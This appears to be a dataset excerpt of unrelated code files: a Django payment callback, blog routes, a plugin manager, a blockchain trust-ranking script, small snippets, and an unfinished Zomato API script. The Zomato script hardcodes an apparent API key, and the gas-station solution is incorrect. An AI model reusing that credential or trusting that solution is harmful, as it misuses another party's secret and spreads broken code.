    # key-ordered "key;value;" concatenation.
    data = OrderedDict(sorted(request.GET.items(), key=lambda x: x[0]))
    try:
        payment = Payment.objects.get(bank_id=data.get('mdOrder'))
    except Payment.DoesNotExist:
        return HttpResponse(status=200)
    merchant = settings.MERCHANTS.get(settings.MERCHANT_KEY)
    hash_key = merchant.get('hash_key')
    if hash_key:
        check_str = ''
        for key, value in data.items():
            if key != 'checksum':
                check_str += "%s;%s;" % (key, value)
        checksum = hmac.new(hash_key.encode(), check_str.encode(), sha256) \
            .hexdigest().upper()
        LogEntry.objects.create(
            action="callback",
            bank_id=payment.bank_id,
            payment_id=payment.uid,
            response_text=json.dumps(request.GET),
            checksum=checksum
        )
        if checksum != data.get('checksum'):
            # Signature mismatch: mark the payment failed and reject.
            payment.status = Status.FAILED
            payment.save()
            return HttpResponseBadRequest('Checksum check failed')
    # Bank protocol: status 1 = success, 0 = failure.
    # NOTE(review): int(data.get('status')) raises TypeError if 'status'
    # is absent from the callback -- confirm the bank always sends it.
    if int(data.get('status')) == 1:
        payment.status = Status.SUCCEEDED
    elif int(data.get('status')) == 0:
        payment.status = Status.FAILED
    payment.save()
    return HttpResponse(status=200)
def redirect(request, kind=None):
    """Browser return URL from the bank (kind distinguishes the outcome page).

    Re-checks the payment status at the bank, logs the redirect, then
    forwards the user to the merchant's configured app URL for *kind*
    with the payment uid appended.
    """
    try:
        payment = Payment.objects.get(bank_id=request.GET.get('orderId'))
    except Payment.DoesNotExist:
        return HttpResponse(status=404)
    svc = BankService(settings.MERCHANT_KEY)
    # Pull the authoritative status from the bank before redirecting.
    svc.check_status(payment.uid)
    LogEntry.objects.create(
        action="redirect_%s" % kind,
        bank_id=payment.bank_id,
        payment_id=payment.uid,
        response_text=json.dumps(request.GET),
    )
    # NOTE(review): presumably reverses binding-verification charges --
    # confirm BankService.check_bind_refund semantics.
    svc.check_bind_refund(payment)
    merchant = settings.MERCHANTS.get(settings.MERCHANT_KEY)
    return HttpResponseRedirect("%s?payment=%s" % (merchant["app_%s_url" % kind], payment.uid))
|
993,524 | 7775c311ea01de9b283508abbeeb32285254b43e | from django.conf.urls import patterns, include, url
from django.contrib import admin
import urls
from apps.blog import views
# Blog URL routes. NOTE(review): ``patterns()`` only exists on Django <= 1.9;
# newer Django requires a plain list of url()/path() entries -- confirm the
# project's Django version.
urlpatterns = patterns('',
    # Post detail page: /p/<pk>/<slug>/
    url(r'^p/(?P<pk>[\w\d]+)/(?P<slug>[\w\d-]+)/$', views.PostDetail.as_view(), name='detail'),
    # Posts filtered by category name
    url(r'^category/(?P<catname>[\w\d]+)/$', views.CatDetail.as_view(), name='catViews'),
    # Posts filtered by tag name
    url(r'^tag/(?P<tagname>[\w\d]+)/$', views.TagDetail.as_view(), name='tagViews'),
)
|
993,525 | 5d5299a5f4c05942ffb407d6519ea45fd71b989d | # Generated by Django 3.2 on 2021-06-19 08:18
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the required ``column`` choice field to
    PhotoPortfolio (the one-off default ``1`` only backfills existing rows)."""

    dependencies = [
        ('photographer', '0021_photoportfolio_seat_number'),
    ]

    operations = [
        migrations.AddField(
            model_name='photoportfolio',
            name='column',
            field=models.CharField(choices=[('kolumna1', 'kolumna1'), ('kolumna2', 'kolumna2'), ('kolumna3', 'kolumna3')], default=1, max_length=20),
            preserve_default=False,
        ),
    ]
|
993,526 | 807adbcce4c99262170c50b35d6a368aa8dfe216 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains implementation for DCC tools
"""
from __future__ import print_function, division, absolute_import
import os
import logging
import inspect
from collections import OrderedDict
from tpDcc import dcc
from tpDcc.core import tool
from tpDcc.managers import plugins, configs, resources
from tpDcc.libs.python import decorators, python, path as path_utils
from tpDcc.libs.qt.core import contexts
import pkgutil
if python.is_python2():
import pkgutil as loader
else:
import importlib.util
import importlib as loader
LOGGER = logging.getLogger('tpDcc-core')
@decorators.add_metaclass(decorators.Singleton)
class ToolsManager(plugins.PluginsManager, object):
    def __init__(self):
        """Initializes the singleton tools manager with DccTool as the plugin
        interface and empty tool registries."""
        super(ToolsManager, self).__init__(interface=tool.DccTool)

        self._layout = dict()                # layout data keyed per package (populated later)
        self._loaded_tools = dict()          # tools already loaded/instantiated
        self._tools_to_load = OrderedDict()  # tools queued for loading, in order
        self._hub_tools = list()             # tools registered against the hub
# ============================================================================================================
# BASE
# ============================================================================================================
def load_plugin(self, pkg_name, pkg_loaders, environment, root_pkg_name=None, config_dict=None, load=True):
"""
Implements load_plugin function
Registers a plugin instance to the manager
:param pkg_name: str
:param pkg_loaders: plugin instance to register
:param environment:
:param root_pkg_name:
:param config_dict:
:param load:
:return: Plugin
"""
if not pkg_loaders:
return False
package_loader = pkg_loaders[0] if isinstance(pkg_loaders, (list, tuple)) else pkg_loaders
if not package_loader:
return False
if hasattr(package_loader, 'loader'):
if not package_loader.loader:
return False
plugin_path = package_loader.filename if python.is_python2() else os.path.dirname(package_loader.loader.path)
plugin_name = package_loader.fullname if python.is_python2() else package_loader.loader.name
if not config_dict:
config_dict = dict()
local = os.getenv('APPDATA') or os.getenv('HOME')
config_dict.update({
'join': os.path.join,
'user': os.path.expanduser('~'),
'filename': plugin_path,
'fullname': plugin_name,
'root': path_utils.clean_path(plugin_path),
'local': local,
'home': local
})
if pkg_name not in self._plugins:
self._plugins[pkg_name] = dict()
tools_found = list()
version_found = None
packages_to_walk = [plugin_path] if python.is_python2() else [os.path.dirname(plugin_path)]
for sub_module in pkgutil.walk_packages(packages_to_walk):
importer, sub_module_name, _ = sub_module
qname = '{}.{}'.format(plugin_name, sub_module_name)
try:
mod = importer.find_module(sub_module_name).load_module(sub_module_name)
except Exception:
# LOGGER.exception('Impossible to register plugin: "{}"'.format(plugin_path))
continue
if qname.endswith('__version__') and hasattr(mod, '__version__'):
if version_found:
LOGGER.warning('Already found version: "{}" for "{}"'.format(version_found, plugin_name))
else:
version_found = getattr(mod, '__version__')
mod.LOADED = load
for cname, obj in inspect.getmembers(mod, inspect.isclass):
for interface in self._interfaces:
if issubclass(obj, interface):
tool_config_dict = obj.config_dict(file_name=plugin_path) or dict()
if not tool_config_dict:
continue
tool_id = tool_config_dict.get('id', None)
tool_config_name = tool_config_dict.get('name', None)
# tool_icon = tool_config_dict.get('icon', None)
if not tool_id:
LOGGER.warning(
'Impossible to register tool "{}" because its ID is not defined!'.format(tool_id))
continue
if not tool_config_name:
LOGGER.warning(
'Impossible to register tool "{}" because its name is not defined!'.format(
tool_config_name))
continue
if root_pkg_name and root_pkg_name in self._plugins and tool_id in self._plugins[root_pkg_name]:
LOGGER.warning(
'Impossible to register tool "{}" because its ID "{}" its already defined!'.format(
tool_config_name, tool_id))
continue
if not version_found:
version_found = '0.0.0'
obj.VERSION = version_found
obj.FILE_NAME = plugin_path
obj.FULL_NAME = plugin_name
tools_found.append((qname, version_found, obj))
version_found = True
break
if not tools_found:
LOGGER.warning('No tools found in module "{}". Skipping ...'.format(plugin_path))
return False
if len(tools_found) > 1:
LOGGER.warning(
'Multiple tools found ({}) in module "{}". Loading first one. {} ...'.format(
len(tools_found), plugin_path, tools_found[-1]))
tool_found = tools_found[-1]
else:
tool_found = tools_found[0]
tool_loader = loader.find_loader(tool_found[0])
# Check if DCC specific implementation for plugin exists
dcc_path = '{}.dccs.{}'.format(plugin_name, dcc.get_name())
dcc_loader = None
dcc_config = None
try:
dcc_loader = loader.find_loader(dcc_path)
except ImportError:
pass
tool_config_dict = tool_found[2].config_dict(file_name=plugin_path) or dict()
tool_id = tool_config_dict['id']
_tool_name = tool_config_dict['name']
tool_icon = tool_config_dict['icon']
tool_config_name = plugin_name.replace('.', '-')
tool_config = configs.get_config(
config_name=tool_config_name, package_name=pkg_name, root_package_name=root_pkg_name,
environment=environment, config_dict=config_dict, extra_data=tool_config_dict)
if dcc_loader:
dcc_path = dcc_loader.fullname
dcc_config = configs.get_config(
config_name=dcc_path.replace('.', '-'), package_name=pkg_name,
environment=environment, config_dict=config_dict)
if not dcc_config.get_path():
dcc_config = None
# Register resources
def_resources_path = os.path.join(plugin_path, 'resources')
# resources_path = plugin_config.data.get('resources_path', def_resources_path)
resources_path = tool_config_dict.get('resources_path', None)
if not resources_path or not os.path.isdir(resources_path):
resources_path = def_resources_path
if os.path.isdir(resources_path):
resources.register_resource(resources_path, key='tools')
else:
pass
# tp.logger.debug('No resources directory found for plugin "{}" ...'.format(_plugin_name))
# Register DCC specific resources
if dcc_loader and dcc_config:
def_resources_path = os.path.join(dcc_loader.filename, 'resources')
resources_path = dcc_config.data.get('resources_path', def_resources_path)
if not resources_path or not os.path.isdir(resources_path):
resources_path = def_resources_path
if os.path.isdir(resources_path):
resources.register_resource(resources_path, key='plugins')
else:
pass
# tp.logger.debug('No resources directory found for plugin "{}" ...'.format(_plugin_name))
# Create tool loggers directory
default_logger_dir = os.path.normpath(os.path.join(os.path.expanduser('~'), 'tpDcc', 'logs', 'tools'))
default_logging_config = os.path.join(plugin_path, '__logging__.ini')
logger_dir = tool_config_dict.get('logger_dir', default_logger_dir)
if not os.path.isdir(logger_dir):
os.makedirs(logger_dir)
logging_file = tool_config_dict.get('logging_file', default_logging_config)
tool_package = plugin_name
tool_package_path = plugin_path
dcc_package = None
dcc_package_path = None
if dcc_loader:
dcc_package = dcc_loader.fullname if python.is_python2() else dcc_loader.loader.path
dcc_package_path = dcc_loader.filename if python.is_python2() else dcc_loader.loader.name
self._plugins[pkg_name][tool_id] = {
'name': _tool_name,
'icon': tool_icon,
'package_name': pkg_name,
'loader': package_loader,
'config': tool_config,
'config_dict': tool_config_dict,
'plugin_loader': tool_loader,
'plugin_package': tool_package,
'plugin_package_path': tool_package_path,
'version': tool_found[1] if tool_found[1] is not None else "0.0.0",
'dcc_loader': dcc_loader,
'dcc_package': dcc_package,
'dcc_package_path': dcc_package_path,
'dcc_config': dcc_config,
'logging_file': logging_file,
'plugin_instance': None
}
LOGGER.info('Tool "{}" registered successfully!'.format(plugin_name))
return True
def get_tool_settings_file_path(self, tool_id):
"""
Returns the path where tool settings file is located
:param tool_id:
:return: str
"""
settings_path = path_utils.get_user_data_dir(appname=tool_id)
settings_file = path_utils.clean_path(os.path.expandvars(os.path.join(settings_path, 'settings.cfg')))
return settings_file
    def get_tool_settings_file(self, tool_id):
        """
        Returns the settings file of the given tool
        :param tool_id: str
        :return: settings.QtSettings
        """

        # Imported locally so Qt is not pulled in at module import time.
        from tpDcc.libs.qt.core import settings

        settings_file = self.get_tool_settings_file_path(tool_id)

        return settings.QtSettings(filename=settings_file)
def get_tool_data_from_id(self, tool_id, package_name=None):
"""
Returns registered plugin data from its id
:param tool_id: str
:param package_name: str
:return: dict
"""
if not tool_id:
return None
if not package_name:
package_name = tool_id.replace('.', '-').split('-')[0]
if package_name and package_name not in self._plugins:
LOGGER.error('Impossible to retrieve data from id: {} package "{}" not registered!'.format(
tool_id, package_name))
return None
return self._plugins[package_name][tool_id] if tool_id in self._plugins[package_name] else None
def cleanup(self):
"""
Cleanup all loaded tools
:return:
"""
from tpDcc.managers import menus
LOGGER.info('Cleaning tools ...')
for plug_name, plug in self._plugins.items():
plug.cleanup()
LOGGER.info('Shutting down tool: {}'.format(plug.ID))
# plugin_id = plug.keys()[0]
self._plugins.pop(plug_name)
self._plugins = dict()
for package_name in self._plugins.keys():
menus.remove_previous_menus(package_name=package_name)
# ============================================================================================================
# TOOLS
# ============================================================================================================
    def register_package_tools(self, pkg_name, root_pkg_name=None, tools_to_register=None, dev=True, config_dict=None):
        """
        Registers all tools available in given package
        :param pkg_name: str, package the tools belong to
        :param root_pkg_name: str or None, root package used later for ID clash checks
        :param tools_to_register: str or list(str), tool module names to register
        :param dev: bool, resolve configs in 'development' (True) or 'production' mode
        :param config_dict: dict or None, extra data merged into each tool config
        :return: OrderedDict or None, accumulated tool registration data
        """

        environment = 'development' if dev else 'production'

        if not tools_to_register:
            return
        tools_to_register = python.force_list(tools_to_register)
        if config_dict is None:
            config_dict = dict()

        tools_path = '{}.tools.{}'
        for tool_name in tools_to_register:
            pkg_path = tools_path.format(pkg_name, tool_name)
            # Loader lookup API differs between Python 2 and Python 3.
            if python.is_python2():
                pkg_loader = loader.find_loader(pkg_path)
            else:
                pkg_loader = importlib.util.find_spec(pkg_path)
            if not pkg_loader:
                # Module not found: silently skip this tool name.
                continue
            else:
                tool_data = {
                    'loaders': pkg_loader,
                    'pkg_name': pkg_name,
                    'root_pkg_name': root_pkg_name,
                    'environment': environment,
                    'config_dict': config_dict
                }
                self._tools_to_load[tool_name] = tool_data

        return self._tools_to_load
    def load_registered_tools(self, package_name):
        """
        Load all tools that were already registered
        :param package_name: str, only tools registered for this package are loaded
        :return: None
        """

        if not self._tools_to_load:
            LOGGER.warning('No tools to register found!')
            return

        for tool_name, tool_data in self._tools_to_load.items():
            pkg_name = tool_data['pkg_name']
            # Skip tools that belong to other packages.
            if pkg_name != package_name:
                continue
            root_pkg_name = tool_data['root_pkg_name']
            pkg_loaders = tool_data['loaders']
            environment = tool_data['environment']
            config_dict = tool_data['config_dict']
            self.load_plugin(
                pkg_name=pkg_name, root_pkg_name=root_pkg_name, pkg_loaders=pkg_loaders, environment=environment,
                load=True, config_dict=config_dict)
def get_registered_tools(self, package_name=None):
"""
Returns all registered tools
:param package_name: str or None
:return: list
"""
if not self._plugins:
return None
if package_name and package_name not in self._plugins:
LOGGER.error('Impossible to retrieve data from instance: package "{}" not registered!'.format(package_name))
return None
if package_name:
return self._plugins[package_name]
else:
all_tools = dict()
for package_name, package_data in self._plugins.items():
for tool_name, tool_data in package_data.items():
all_tools[tool_name] = tool_data
return all_tools
def get_package_tools(self, package_name):
"""
Returns all tools of the given package
:param package_name: str
:return: list
"""
if not package_name:
LOGGER.error('Impossible to retrieve data from plugin with undefined package!')
return None
if package_name not in self._plugins:
LOGGER.error('Impossible to retrieve data from instance: package "{}" not registered!'.format(package_name))
return None
package_tools = self.get_registered_tools(package_name=package_name)
return package_tools
def get_tool_by_plugin_instance(self, plugin, package_name=None):
"""
Returns tool instance by given plugin instance
:param plugin:
:param package_name: str
:return:
"""
if not package_name:
package_name = plugin.PACKAGE if hasattr(plugins, 'PACKAGE') else None
if not package_name:
LOGGER.error('Impossible to retrieve data from plugin with undefined package!')
return None
if package_name not in self._plugins:
LOGGER.error(
'Impossible to retrieve data from instance: package "{}" not registered!'.format(package_name))
return None
if hasattr(plugin, 'ID'):
return self.get_tool_by_id(tool_id=plugin.ID, package_name=plugin.PACKAGE)
return None
def get_tool_by_id(self, tool_id, package_name=None, dev=False, *args, **kwargs):
"""
Launches tool of a specific package by its ID
:param tool_id: str, tool ID
:param package_name: str, str
:param dev: bool
:param args: tuple, arguments to pass to the tool execute function
:param kwargs: dict, keyword arguments to pas to the tool execute function
:return: DccTool or None, executed tool instance
"""
if not package_name:
package_name = tool_id.replace('.', '-').split('-')[0]
if package_name not in self._plugins:
LOGGER.warning('Impossible to load tool by id: package "{}" is not registered!'.format(package_name))
return None
if tool_id in self._plugins[package_name]:
tool_inst = self._plugins[package_name][tool_id].get('tool_instance', None)
if tool_inst:
return tool_inst
tool_to_run = None
for plugin_id in self._plugins[package_name].keys():
tool_path = self._plugins[package_name][plugin_id]['plugin_package']
sec_path = tool_path.replace('.', '-')
if sec_path == tool_path or sec_path == tool_id:
tool_to_run = tool_id
break
else:
tool_name = tool_path.split('.')[-1]
if tool_name == tool_path:
tool_to_run = tool_id
break
if not tool_to_run or tool_to_run not in self._plugins[package_name]:
LOGGER.warning('Tool "{}" is not registered!'.format(tool_id))
return None
tool_loader = self._plugins[package_name][tool_to_run]['loader']
pkg_loader = self._plugins[package_name][tool_to_run]['loader']
tool_config = self._plugins[package_name][tool_to_run]['config']
tool_fullname = tool_loader.fullname if python.is_python2() else tool_loader.loader.name
tool_version = self._plugins[package_name][tool_to_run]['version']
pkg_name = pkg_loader.filename if python.is_python2() else os.path.dirname(pkg_loader.loader.path)
pkg_path = pkg_loader.fullname if python.is_python2() else pkg_loader.loader.name
tool_found = None
for sub_module in pkgutil.walk_packages([self._plugins[package_name][tool_to_run]['plugin_package_path']]):
tool_importer, sub_module_name, _ = sub_module
mod = tool_importer.find_module(sub_module_name).load_module(sub_module_name)
for cname, obj in inspect.getmembers(mod, inspect.isclass):
if issubclass(obj, tool.DccTool):
obj.FILE_NAME = pkg_name
obj.FULL_NAME = pkg_path
tool_found = obj
break
if tool_found:
break
if not tool_found:
LOGGER.error("Error while launching tool: {}".format(tool_fullname))
return None
# if dcc_loader:
# tool_config = dcc_config
tool_settings = self.get_tool_settings_file(tool_id)
if not tool_settings.has_setting('theme'):
tool_settings.set('theme', 'default')
tool_settings.setFallbacksEnabled(False)
tool_inst = tool_found(self, config=tool_config, settings=tool_settings, dev=dev, *args, **kwargs)
tool_inst.ID = tool_id
tool_inst.VERSION = tool_version
tool_inst.AUTHOR = tool_inst.config_dict().get('creator', None)
tool_inst.PACKAGE = package_name
self._plugins[package_name][tool_id]['tool_instance'] = tool_inst
# self._plugins[package_name][plugin_id]['tool_instance'] = tool_inst
return tool_inst
    def launch_tool_by_id(self, tool_id, package_name=None, dev=False, *args, **kwargs):
        """
        Launches tool of a specific package by its ID
        :param tool_id: str, tool ID
        :param package_name: str, str
        :param dev: bool
        :param args: tuple, arguments to pass to the tool execute function
        :param kwargs: dict, keyword arguments to pas to the tool execute function
        :return: DccTool or None, executed tool instance
        """

        tool_inst = self.get_tool_by_id(
            tool_id=tool_id, package_name=package_name, dev=dev, *args, **kwargs)
        if not tool_inst:
            return None

        # When 'hub' is requested, try to open the tool inside the currently
        # focused Hub UI instead of as a standalone window.
        hub = kwargs.pop('hub', False)
        if hub and tool_id != 'tpDcc-tools-hub':
            hub_ui = self.get_last_focused_hub_ui(include_minimized=False)
            if hub_ui:
                hub_ui.toggle_toolset(tool_id)
                return tool_inst
            else:
                # Fall through to the standalone launch path below.
                LOGGER.warning('No HubUI tool opened. Opening tool using standard method ...')

        # Close any previous instance before launching a fresh one.
        self.close_tool(tool_id)
        with contexts.application():
            self._launch_tool(tool_inst, tool_id, *args, **kwargs)

        return tool_inst
    def close_tool(self, tool_id, force=True):
        """
        Closes tool with given ID
        :param tool_id: str
        :param force: bool, when True the attached widget is also unparented and deleted
        :return: bool, True if the tool was tracked (and is now removed); False otherwise
        """

        if tool_id not in self._loaded_tools:
            return False

        closed_tool = False

        # First try to close the tool widget through the DCC main window children.
        parent = dcc.get_main_window()
        if parent:
            for child in parent.children():
                if child.objectName() == tool_id:
                    child.fade_close() if hasattr(child, 'fade_close') else child.close()
                    closed_tool = True

        tool_to_close = self._loaded_tools[tool_id].attacher
        try:
            if not closed_tool and tool_to_close:
                tool_to_close.fade_close() if hasattr(tool_to_close, 'fade_close') else tool_to_close.close()
            if force and tool_to_close:
                tool_to_close.setParent(None)
                tool_to_close.deleteLater()
        except RuntimeError:
            # The Qt widget may already have been deleted on the C++ side.
            pass

        self._loaded_tools.pop(tool_id)

        return True
def close_tools(self):
"""
Closes all available tools
:return:
"""
for tool_id in self._loaded_tools.keys():
self.close_tool(tool_id, force=True)
    def _launch_tool(self, tool_inst, tool_id, *args, **kwargs):
        """
        Launches given tool class
        :param tool_inst: cls, DccTool instance
        :param tool_id: str, tool ID
        :param args: tuple, arguments to pass to tool execute function
        :param kwargs: dict, keyword arguments to pass to the tool execute function
        :return: DccTool or None, executed tool instance
        """

        if tool_id == 'tpDcc-tools-hub':
            # Hub tools are tracked separately by their UI object.
            tool_data = tool_inst._launch(*args, **kwargs)
            tool_ui = tool_data['tool']
            self._hub_tools.append(tool_ui)
        else:
            # Make sure any previous instance is closed before relaunching.
            self.close_tool(tool_id)
            tool_inst._launch(*args, **kwargs)

        self._loaded_tools[tool_id] = tool_inst
        LOGGER.debug('Execution time: {}'.format(tool_inst.stats.execution_time))

        return tool_inst
# ============================================================================================================
# HUB
# ============================================================================================================
    def close_hub_ui(self, hub_ui_inst):
        """
        Unregister the given Hub UI instance from the tracked list.
        :param hub_ui_inst: HubUI
        """

        if hub_ui_inst in self._hub_tools:
            self._hub_tools.remove(hub_ui_inst)
            LOGGER.debug('Close tpDcc Hub UI: {}'.format(hub_ui_inst))
    def get_hub_uis(self):
        """
        Return the list of currently opened Hub UI instances.
        :return: list
        """
        return self._hub_tools
def get_last_focused_hub_ui(self, include_minimized=True):
"""
Returns last focused Hub UI
:param include_minimized: bool, Whether or not take into consideration Hub UIs that are minimized
:return: HubUI
"""
hub_ui_found = None
max_time = 0
all_hub_uis = self.get_hub_uis()
for ui in all_hub_uis:
if ui.isVisible() and ui.last_focused_time > max_time:
if (not include_minimized and not ui.isMinimized()) or include_minimized:
hub_ui_found = ui
max_time = ui.last_focused_time
return hub_ui_found
def get_last_opened_hub_ui(self):
"""
Returns last opened Hub UI
:return: HubUI
"""
hub_ui_found = None
all_hub_uis = self.get_hub_uis()
for ui in all_hub_uis:
if ui.isVisible():
hub_ui_found = ui
return hub_ui_found
# ============================================================================================================
# CONFIGS
# ============================================================================================================
    def get_tool_config(self, tool_id, package_name=None):
        """
        Returns config applied to given tool
        :param tool_id: str
        :param package_name: str or None, derived from the tool ID when not given
        :return: config object or None
        """

        if not package_name:
            # Tool IDs follow the '<package>-tools-<name>' convention, so the
            # package is the first dash-separated token.
            package_name = tool_id.replace('.', '-').split('-')[0]

        if package_name not in self._plugins:
            LOGGER.warning(
                'Impossible to retrieve tool config for "{}" in package "{}"! Package not registered.'.format(
                    tool_id, package_name))
            return None
        if tool_id not in self._plugins[package_name]:
            LOGGER.warning(
                'Impossible to retrieve tool config for "{}" in package "{}"! Tool not found'.format(
                    tool_id, package_name))
            return None

        config = self._plugins[package_name][tool_id].get('config', None)

        return config
# ============================================================================================================
# THEMES
# ============================================================================================================
    def get_tool_theme(self, tool_id, package_name=None):
        """
        Returns theme applied to given tool
        :param tool_id: str
        :param package_name: str or None
        :return: Theme or None
        """

        found_tool = self.get_tool_by_id(tool_id, package_name=package_name)
        if not found_tool:
            return None

        # Fall back to the 'default' theme when the tool has none stored.
        theme_name = found_tool.settings.get('theme', 'default')

        return resources.theme(theme_name)
|
993,527 | 36d67062ac0e5ce456568b5888710af246d3f75b | import urllib.request
import random
import json
import os
from time import sleep
#print(authenticNode)
connected_nodes = [] #nodes present in the network
banned_nodes = {} # banned nodes
trust_values = {} # trust values of each and every node
trust_ranking = {} # ranking based on trust value (visible)
def checkConnectivity():  # checking connectivity of nodes in network
    """Ping each known node URL with curl and record reachable ones in connected_nodes."""
    nodes = ["http://192.168.29.39:3001/", "http://192.168.29.39:3002/", "http://192.168.29.39:3003/", "http://192.168.29.39:3004/", "http://192.168.29.39:3005/"]
    for node in nodes:
        # os.system returns the shell exit status: 0 means curl reached the node.
        response = os.system("curl -I " + node)
        if response == 0:
            # Store the URL without its trailing '/'.
            connected_nodes.append(node[:-1])
# Populate connected_nodes once at import time, then give every reachable
# node an initial trust score of zero.
checkConnectivity()
trust_values = { i : 0 for i in connected_nodes }
def connectionPersists(node):  # persistance of connection of nodes in network
    """Return True when the node still answers a curl HEAD request, False otherwise."""

    exit_status = os.system("curl -I " + node + "/")
    return exit_status == 0
#checkConnectivity()
#print (connected_nodes)
#print (trust_values)
def authentication():  # validation phase of transaction
    """
    Validation phase: fetch the blockchain from a random connected node and
    award one trust point to the node of every pending transaction.

    BUG FIX: the original condition
    ``not 'pendingTransactions' in data or len(...) != 0`` entered the loop
    precisely when the key was MISSING, raising KeyError. ``dict.get`` now
    covers both the missing-key and the empty-list cases.
    """

    node = random.choice(connected_nodes)
    url = node + "/blockchain"
    open_url = urllib.request.urlopen(url)
    data = json.load(open_url)

    if data.get('pendingTransactions'):
        for txn in data['pendingTransactions']:
            trust_values[txn['node']] = trust_values[txn['node']] + 1
    else:
        print ("No pending transaction to process")
#authentication()
#print (trust_values)
"""
nodes = ["http://192.168.29.39:3001/", "http://192.168.29.39:3002/", "http://192.168.29.39:3003/", "http://192.168.29.39:3004/", "http://192.168.29.39:3005/"]
trust = {nodes[0]:0,nodes[1]:0, nodes[2]:0, nodes[3]:0, nodes[4]:0}
list_node=[]
def authentication():
node = random.choice(nodes)
url = node + "/blockchain"
r = urllib.request.urlopen(url)
data = json.load(r)
for txn in data['pendingTransactions']:
#print(txn['transactionId'])
list_node.append(txn['nodeName'])
#authentication()
#print (list_node)
def dosprevention():
#checkConnectivity()
if (checkConnectivity()):
sleep(60)
if (checkConnectivity()):
value = trust[dos_prevented]
value = value +8
trust[dos_prevented] = value
else:
value = trust[dos_prevented]
value = value - 8
trust[dos_prevented] = value
else:
print ("Network node not connected")
def mine():
a = authentication()
if len(list_node) !=0:
for node in list_node:
value = trust[node]
#print(value)
value = value + 1
trust[node]=value
#print ("ignore")
list_node = []
miner_node = random.choice(nodes)
url = miner_node + "/mine"
r = urllib.request.urlopen(url)
data = json.load(r)
value = trust[miner_node]
value = value +8
trust[miner_node]=value
def scalable():
print ("scaling")
def trustvalue():
authentication(node)
mine(node)
dosPrevention()
#majorityApproval(node)
"""
def timeMeasure():  # time based incentives for nodes
    """Award one trust point to every node whose connection is still alive."""

    for node in connected_nodes:
        if connectionPersists(node):
            trust_values[node] += 1
def blockMiner():  # mining rewards for nodes which also includes points
    """Run the validation phase, then ask a random node to mine and award it 8 points."""
    authentication()
    miner_node = random.choice(connected_nodes)
    url = miner_node + "/mine"
    mined = urllib.request.urlopen(url)
    # The response body is read so the mine request fully completes.
    data = json.load(mined)
    value = trust_values[miner_node]
    value = value + 8
    trust_values[miner_node] = value
def banned(node, value):  # trace of banned nodes
    """
    Record a banned node together with the trust value it was banned at.

    BUG FIX: the original called ``banned_nodes.update({node, value})`` --
    ``{node, value}`` is a *set* literal, which ``dict.update`` rejects.
    Assign the mapping entry directly instead.
    """

    banned_nodes[node] = value
def trustRanking(trust_value):  # trust ranking based on points in network
    """
    Map every node's trust points to a named rank stored in trust_ranking;
    nodes below -10 points are handed to banned().

    BUG FIX: the original elif chain mixed inclusive upper bounds with
    EXCLUSIVE lower bounds ("11 < x <= 18", "19 < x <= 32", ...), so the
    boundary values 11, 19, 33, 41, 53, 61, 76, 83, 100, 121, 181 and 301
    matched no branch and never received a rank. A single table of
    inclusive upper bounds, scanned in ascending order, leaves no gaps.
    """

    # (inclusive upper bound, rank name), ascending; anything above the last
    # bound is "Gold 3".
    rank_table = [
        (-1, "NA"),
        (10, "Silver 1"),
        (18, "Silver 2"),
        (32, "Silver 3"),
        (40, "Silver 4"),
        (52, "Silver 5"),
        (60, "Silver 6"),
        (75, "Silver 7"),
        (82, "Silver 8"),
        (99, "Silver 9"),
        (120, "Silver 10"),
        (180, "Gold 1"),
        (300, "Gold 2"),
    ]

    for node in trust_value:
        points = trust_value[node]
        if points < -10:
            banned(node, points)
            continue
        for upper_bound, rank in rank_table:
            if points <= upper_bound:
                trust_ranking[node] = rank
                break
        else:
            trust_ranking[node] = "Gold 3"
#print (trust_values)
#blockMiner()
#print (trust_values)
#trustRanking(trust_values)
#print (trust_values)
def buildingTrust():  # infinite running and monitoring function which will keep track of ranks of nodes
    """Main loop: mine, reward uptime, recompute ranks and print them every 100 seconds. Never returns."""
    while True:
        blockMiner()
        timeMeasure()
        trustRanking(trust_values)
        print (trust_ranking)
        # Throttle the monitoring cycle.
        sleep(100)
buildingTrust()
"""
while True:
mine()
print (trust)
sleep(100)
#print (trust)
"""
|
993,528 | aa2429037a5d8feb8d8e452eb0cd47e1d54b3343 | import hashlib
# Compute and print the SHA-256 hex digest of the bytes b'Kim'.
h = hashlib.sha256(b'Kim')
result = h.hexdigest()
print(result)
|
993,529 | 8f38d0eb94f9c937ac7f5dfb6ee28745c511f1f0 | class Solution:
def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:
gasNo = 0
costNo = 0
total = 0
while gasNo < len(gas) and costNo < len(cost):
if cost[costNo] < gas[gasNo]:
total = gas[gasNo] - cost[costNo]
if total < 0:
return (-1)
gasNo += 1
costNo += 1
else :
total = total + gas[gasNo] + cost[costNo]
return total
|
993,530 | 4874ee64554acc5e5245cb1c548fa737395724cd | ############################# Latihan - Tugas 1
'''
Gunakan API dari Zomato
Selamat datang di Zomato Apps:
Silahkan pilih opsi :
1. Cari resto
2. Daily Menu
Opsi 1 :
Mencari Restoran di kota tertentu
Input:
- Masukkan Nama Kota : (error handling)
- Masukkan Jumlah Restoran yang akan ditampilkan : contoh berapa jumlah restoran 1/5/10/all
Outputnya :
- Nama Restoran : .....
- Establishment Name : .....
- Cuisine Name : .....
- Alamat : .....
- No. Telfon : ....
- Rating : ...(angka)...
- Review : ...(angka)...
# 1x run bisa banyak url yang kita get, coba2 get yang sesuai
Opsi 2 :
Daily Menu - Menu Harian Restor
Input :
- Masukkan nama Kota : (error handling)
- Masukkan nama Resto :
- Jumlah menu yang akan ditampilkan :
Outputnya :
Daily Menu di restoran xxxx adalah ....{Sesuai dengan jumlah menu yang ingin ditampilkan}
'''
# ==================================================================================================
import requests
# key = "953a7c1382d94a98c504ebe56665b0d2"
# cat = "/categories"
# city = "/cities"
# host = "https://developers.zomato.com/api/v2.1"
# head = {"user-key" : key}
# url = host + cat
# url2 = host + city
# data = requests.get(url, headers = head)
# data2 = requests.get(url2, headers = {"user-key" : "953a7c1382d94a98c504ebe56665b0d2"})
# output = data.json()
# print (output['categories'])
key = "953a7c1382d94a98c504ebe56665b0d2"
while True:
print ("======>Welocome to Zomato Apps<======")
print ('''What are you gonna do today ?
1. Find a Restaurant
2. Daily Menu
3. Exit''')
menu = input("Choose your apps (1/2/3) :")
if menu == '1':
print ("====FIND A RESTAURANT====")
while True:
try:
kota = str(input("Please input a city name :")).lower() # Meminta nama kota
